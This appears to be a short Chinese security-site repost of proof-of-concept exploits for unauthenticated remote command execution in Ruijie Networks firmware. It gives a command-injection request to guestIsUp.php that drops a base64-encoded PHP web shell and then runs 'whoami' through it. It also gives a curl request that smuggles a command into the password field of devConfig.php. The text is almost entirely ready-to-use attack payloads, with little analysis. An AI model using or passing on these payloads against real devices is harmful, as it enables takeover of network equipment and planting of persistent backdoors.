Ruijie Networks RCE

2022年7月22日13:26:03评论125 views字数 436阅读1分27秒阅读模式

Ruijie Networks RCE

echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/guestIsUp.php ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 GET /guest_auth/poc.php?cmd=whoami

Ruijie Networks RCE

Another unauthorized RCE in same firmware PoC: curl http://host/openApi/devConfig.php?a=login -X POST -d "{"admin":"admin","encry":true,"password":"1'; COMMAND ;echo 'a"}"

Ruijie Networks RCE

本文始发于微信公众号（Khan安全攻防实验室）：Ruijie Networks RCE

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2022年7月22日13:26:03
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Ruijie Networks RCEhttp://cn-sec.com/archives/534900.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

Ruijie Networks RCE

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

信创 | 国产数据库派别分类

应急响应常用命令手册

漏洞利用-PoC-in-GitHub+msf简单利用

rust 免杀-免杀和喝水一样简单

RFD漏洞原理浅析

发表评论

在线咨询

微信